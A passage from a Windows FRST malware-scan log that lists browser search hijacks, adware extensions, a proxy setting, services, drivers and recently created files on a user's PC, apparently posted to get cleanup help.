ShortcutTarget: watchmi tray.lnk -> C:\Windows\Installer\{F0559C5E-7912-4391-B1A0-6B975F0E5064}\SHCT_TRAY_STARTUP_F1540F35F9254DF584F2487D88448402.exe (Acresso Software Inc.)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

ProxyServer: 111.64.89.97:8080
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.aldi.com
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.bing.com
SearchScopes: HKLM - DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
SearchScopes: HKLM-x32 - DefaultScope {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {69257F85-7DD2-45C1-807F-85414E8ED951} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=HIP&o=102875&src=kw&q={searchTerms}&locale=&apn_ptnrs=^6F&apn_dtid=^YYYYYY^YY^DE&apn_uid=9356c020-5831-4886-b993-34133c28bcb7&apn_sauid=16C594FE-C300-418E-A454-E5100ECDD145
SearchScopes: HKCU - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2413} URL = hxxp://dts.search-results.com/sr?src=ieb&gct=ds&appid=0&systemid=413&apn_dtid=BND413&apn_ptnrs=AGA&o=APN10649&apn_uid=5241357076814249&q={searchTerms}
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~1\MICROS~3\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO: Hotspot Shield Class - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} -  No File
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Norton Identity Protection - {AB4C7833-A6EC-433f-B9FE-6B14B1A2F836} - C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\coIEPlg.dll (Symantec Corporation)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM-x32 - Norton Identity Safe Toolbar - {A13C2648-91D4-4bf3-BC6D-0079707C4389} - C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1

FireFox:
========
FF ProfilePath: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default
FF user.js: detected! => C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\user.js
FF NewTab: hxxp://www.delta-search.com/?babsrc=NT_ss&mntrId=F22C00FF5CDD2F5B&affID=122471&tt=180613_ndt3&tsp=4921
FF SelectedSearchEngine: Delta Search
FF Homepage: hxxp://search.babylon.com/?babsrc=HP_ss_din2g&mntrId=F22C00FF5CDD2F5B&affID=122471&tt=180613_ndt3&tsp=4921
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_6_602_180.dll ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 - C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 - C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\searchplugins\askcom.xml
FF SearchPlugin: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\searchplugins\MyStart Search.xml
FF SearchPlugin: C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\searchplugins\Search_Results.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\wikipedia-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml
FF Extension: No Name - C:\Users\Niklas\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
FF Extension: betterads - C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\Extensions\betterads@BetterAds.org.xpi
FF Extension: toolbar_AVIRA-V7 - C:\Users\Niklas\AppData\Roaming\Mozilla\Firefox\Profiles\va08g8c0.default\Extensions\toolbar_AVIRA-V7@apn.ask.com.xpi
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}
FF HKLM\...\Firefox\Extensions: [{336D0C35-8A85-403a-B9D2-65C292C39087}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM\...\Firefox\Extensions: [{FE1DEEEA-DB6D-44b8-83F0-34FC0F9D1052}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM\...\Firefox\Extensions: [{8E9E3331-D360-4f87-8803-52DE43566502}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM-x32\...\Firefox\Extensions: [{336D0C35-8A85-403a-B9D2-65C292C39087}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM-x32\...\Firefox\Extensions: [webbooster@iminent.com] C:\Program Files (x86)\Iminent\webbooster@iminent.com
FF HKLM-x32\...\Firefox\Extensions: [{FE1DEEEA-DB6D-44b8-83F0-34FC0F9D1052}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox
FF HKLM-x32\...\Firefox\Extensions: [{F04D2D30-776C-4d02-8627-8E4385ECA58D}] C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_2013.4.0.10\coFFPlgn\
FF Extension: Norton Identity Safe Toolbar - C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_2013.4.0.10\coFFPlgn\
FF HKLM-x32\...\Firefox\Extensions: [{8E9E3331-D360-4f87-8803-52DE43566502}] C:\Program Files\Web Assistant\Firefox
FF Extension: Web Assistant - C:\Program Files\Web Assistant\Firefox

Chrome: 
=======
CHR HomePage: hxxp://www.searchnu.com/413
CHR RestoreOnStartup: "hxxp://www.google.de/ig?hl=de&source=webhp"
CHR DefaultSearchURL: (Google) - {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}ie={inputEncoding}
CHR DefaultSuggestURL: (Google) - {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}sugkey={google:suggestAPIKeyParameter}
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\28.0.1500.95\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\28.0.1500.95\pdf.dll ()
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\28.0.1500.95\gcswf32.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.111\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 6 U31) - C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\4.0.60831.0\npctrl.dll No File
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (Windows Live\u0099 Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Extension: (ProxTube) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aakchaleigkohafkfjfjbblobjifikek\1.2.3_0
CHR Extension: (Angry Birds) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj\1.5.0.7_0
CHR Extension: (Chrome YouTube Downloader) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cbdjiinahkdjdcdlgfimlcolkjpbooja\2.6.16_0
CHR Extension: (Give Up) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\diippoclinjdbklinhchgedilfncehbi\1.0.0_0
CHR Extension: (AdBlock) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom\2.6.4_0
CHR Extension: (JavaScript Popup Blocker) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\hiajdlfgbgnnjakkbnpdhmhfhklkbiol\1.2.4_0
CHR Extension: (Isoball 3) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\iajlkcpgcnbhfhpdeooockfaincfkjjj\1.3.0_0
CHR Extension: (hxxp://www.youtube.com/watch?v=t_kCJlBtCEs) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfocndbiglbiapfibmabbdplngmpcih\2012.10.6.49541_0
CHR Extension: (Norton Identity Protection) - C:\Users\Niklas\AppData\Local\Google\Chrome\User Data\Default\Extensions\nppllibpnmahfaklnpggkibhkapjkeob\2013.4.0.10_0
CHR HKLM\...\Chrome\Extension: [dlnembnfbcpjnepmfjmngjenhhajpdfd] - C:\Program Files\Web Assistant\source.crx
CHR HKLM-x32\...\Chrome\Extension: [cacclhdpfoingihegojhoipnihfnoaki] - C:\Users\Niklas\AppData\Local\MediaBA\betterads.crx
CHR HKLM-x32\...\Chrome\Extension: [cgiaikfpllchefojlnehlmpekeogihnm] - C:\Users\Niklas\AppData\Local\CRE\cgiaikfpllchefojlnehlmpekeogihnm.crx
CHR HKLM-x32\...\Chrome\Extension: [dednnpigldgdbpgcdpfppmlcnnbjciel] - C:\Users\Niklas\AppData\Roaming\Media Finder\Extensions\gencrawler_gc.crx
CHR HKLM-x32\...\Chrome\Extension: [dlnembnfbcpjnepmfjmngjenhhajpdfd] - C:\Program Files\Web Assistant\source.crx
CHR HKLM-x32\...\Chrome\Extension: [fgjmgaonhcgbelpohkmegjaneegiigil] - C:\ProgramData\wxDfast\fgjmgaonhcgbelpohkmegjaneegiigil.crx
CHR HKLM-x32\...\Chrome\Extension: [lpmkgpnbiojfaoklbkpfneikocaobfai] - C:\Users\Niklas\AppData\Roaming\Media Finder\Extensions\mf_plugin_gc.crx
CHR HKLM-x32\...\Chrome\Extension: [nppllibpnmahfaklnpggkibhkapjkeob] - C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\Exts\Chrome.crx

==================== Services (Whitelisted) =================

R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [84024 2013-08-18] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [108088 2013-08-18] (Avira Operations GmbH & Co. KG)
S4 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\AVWEBGRD.EXE [589368 2013-08-18] (Avira Operations GmbH & Co. KG)
S4 BroadCamService; C:\Program Files (x86)\NCH Software\BroadCam\broadcam.exe [2584068 2012-07-26] (NCH Software)
S2 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [393032 2013-07-17] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [384840 2013-07-17] (BlueStack Systems, Inc.)
S4 CyberLink PowerDVD 10 MS Monitor Service; C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSMonitorService.exe [70952 2011-04-14] (CyberLink)
S4 CyberLink PowerDVD 10 MS Service; C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSServer.exe [312616 2011-04-14] (CyberLink)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57617752 2009-03-30] (Microsoft Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2011-09-16] ()
R2 NCO; C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\ccSvcHst.exe [144368 2013-05-21] (Symantec Corporation)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [244904 2010-12-14] ()
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1817560 2013-05-16] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [1033688 2013-05-16] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2013-05-15] (Safer-Networking Ltd.)
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [427880 2009-03-30] (Microsoft Corporation)
R3 SystemExplorerHelpService; C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe [821720 2012-11-25] (Mister Group)
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesService64.exe [2402080 2013-01-28] (TuneUp Software)
S4 watchmi; C:\Program Files (x86)\watchmi\TvdService.exe [70144 2012-01-31] ()
R2 Web Assistant; C:\Program Files\Web Assistant\ExtensionUpdaterService.exe [188760 2013-06-30] ()
R2 Web Assistant Updater; C:\Program Files\Web Assistant\ExtensionUpdaterService.exe [188760 2013-06-30] ()
R3 WisLMSvc; C:\Program Files (x86)\Launch Manager\WisLMSvc.exe [118560 2011-08-06] (Wistron Corp.)
R2 ZcfgSvc7; C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe [994064 2011-09-16] (Intel(R) Corporation)

==================== Drivers (Whitelisted) ====================

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [100712 2013-08-18] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [130016 2013-08-18] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-08-18] (Avira Operations GmbH & Co. KG)
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [70984 2013-07-17] (BlueStack Systems)
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [70984 2013-07-17] (BlueStack Systems)
R1 ccSet_NST; C:\Windows\system32\drivers\NSTx64\7DD04000.00A\ccSetx64.sys [169048 2013-04-16] (Symantec Corporation)
R1 HssDRV6; C:\Windows\System32\DRIVERS\hssdrv6.sys [42696 2013-01-20] (AnchorFree Inc.)
S3 IT9135BDA; C:\Windows\System32\Drivers\IT9135BDA.sys [158464 2011-10-27] (ITE                      )
S3 MEMSWEEP2; C:\Windows\system32\1D5F.tmp [6144 2009-06-18] (Sophos Plc)
S3 MEMSWEEP2; C:\Windows\system32\1D5F.tmp [6144 2009-06-18] (Sophos Plc)
R2 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42328 2013-01-05] (Anchorfree Inc.)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesDriver64.sys [11880 2012-11-16] (TuneUp Software)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [x]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [x]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2013-08-22 11:31 - 2013-08-22 11:31 - 00000000 ____D C:\FRST
2013-08-22 11:31 - 2013-08-22 11:29 - 01576476 _____ (Farbar) C:\Users\Niklas\Desktop\FRST64.exe
2013-08-22 11:29 - 2013-08-22 11:29 - 01576476 _____ (Farbar) C:\Users\Niklas\Downloads\FRST64.exe
2013-08-21 18:48 - 2013-08-21 18:48 - 00003836 _____ C:\Users\Niklas\Downloads\fgjmgaonhcgbelpohkmegjaneegiigil.crx
2013-08-21 18:42 - 2013-08-21 18:43 - 00266843 _____ C:\ProgramData\GBox.rar
2013-08-21 18:40 - 2013-08-21 18:40 - 00001090 _____ C:\Users\Public\Desktop\System Explorer.lnk
2013-08-21 18:36 - 2013-08-21 18:36 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (2).exe
2013-08-21 14:33 - 2013-08-21 14:37 - 00000000 ____D C:\Users\Niklas\Desktop\php
2013-08-21 14:25 - 2013-08-21 14:32 - 148380279 _____ C:\Users\Niklas\Downloads\eclipse-php-helios-SR2-win32-x86_64.zip
2013-08-21 13:39 - 2013-08-21 13:39 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Avira
2013-08-21 13:34 - 2013-08-21 13:34 - 00083672 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2013-08-21 13:33 - 2013-08-21 13:33 - 00001998 _____ C:\Users\Public\Desktop\Avira Control Center.lnk
2013-08-21 13:32 - 2013-08-21 13:32 - 00000000 ____D C:\Program Files (x86)\Avira
2013-08-21 13:32 - 2013-08-18 14:16 - 00130016 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2013-08-21 13:32 - 2013-08-18 14:16 - 00100712 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2013-08-21 13:32 - 2013-08-18 14:16 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2013-08-18 18:38 - 2013-07-26 07:13 - 02241024 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2013-08-18 18:38 - 2013-07-26 07:13 - 01365504 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2013-08-18 18:38 - 2013-07-26 07:13 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2013-08-18 18:38 - 2013-07-26 07:12 - 19239424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 15405056 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 03958784 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 02647040 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2013-08-18 18:38 - 2013-07-26 07:12 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2013-08-18 18:38 - 2013-07-26 05:35 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2013-08-18 18:38 - 2013-07-26 05:13 - 01767936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2013-08-18 18:38 - 2013-07-26 05:13 - 01141248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 14329344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 02877440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 02048512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2013-08-18 18:38 - 2013-07-26 05:12 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2013-08-18 18:38 - 2013-07-26 05:11 - 13761024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2013-08-18 18:38 - 2013-07-26 05:11 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2013-08-18 18:38 - 2013-07-26 04:49 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2013-08-18 18:38 - 2013-07-26 04:39 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2013-08-18 18:38 - 2013-07-26 03:59 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2013-08-18 17:32 - 2013-07-09 08:03 - 05550528 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2013-08-18 17:32 - 2013-07-09 07:54 - 01732032 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2013-08-18 17:32 - 2013-07-09 07:53 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2013-08-18 17:32 - 2013-07-09 07:03 - 03968960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2013-08-18 17:32 - 2013-07-09 07:03 - 03913664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
